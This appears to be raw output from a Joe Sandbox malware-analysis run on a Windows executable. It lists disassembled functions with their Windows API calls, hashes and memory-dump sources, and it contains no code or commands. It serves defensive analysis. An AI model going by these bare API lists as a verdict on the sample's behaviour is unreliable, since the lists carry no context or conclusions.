                                                                                                                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$AttributesFile
                                                                                                                                                                  • String ID: \VH
                                                                                                                                                                  • API String ID: 751036072-234962358
                                                                                                                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
• Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
• Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: b2f6c81cb5893e82bf535347fa7293d1c6abf3951e893cfe36b26892c901a961
• Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
• Opcode Fuzzy Hash: b2f6c81cb5893e82bf535347fa7293d1c6abf3951e893cfe36b26892c901a961
• Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
• Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
• Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID: SysAnimate32
• API String ID: 0-1011021900
• Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
• Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
APIs
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID: \
• API String ID: 2267087916-2967466578
                                                                                                                                                                  • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                                  • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu$\VH
• API String ID: 2507767853-2432546070
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
Similarity
• API ID: ConnectRegistry
• String ID:
• API String ID: 76216097-0
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
• Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
• Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
APIs
• GetCursorPos.USER32(?), ref: 004563A6
• ScreenToClient.USER32(?,?), ref: 004563C3
• GetAsyncKeyState.USER32(?), ref: 00456400
• GetAsyncKeyState.USER32(?), ref: 00456410
• GetWindowLongW.USER32(?,000000F0), ref: 00456466
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
• Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
• Sleep.KERNEL32(0000000A), ref: 0047D455
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID:
• API String ID: 327565842-0
• Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
• Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 6977aaa8d418497da5d790c089433aad42042d8112de828a40e3df56c6de2bfb
• Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
• Opcode Fuzzy Hash: 6977aaa8d418497da5d790c089433aad42042d8112de828a40e3df56c6de2bfb
• Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
• Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
APIs
• GetWindowRect.USER32(?,?), ref: 00436A24
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
• Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
• Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(033164B0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1300944170-0
                                                                                                                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1822080540-0
                                                                                                                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 659298297-0
                                                                                                                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03311C00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(03311C00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 142311417-0
                                                                                                                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                                  Memory Dump Source
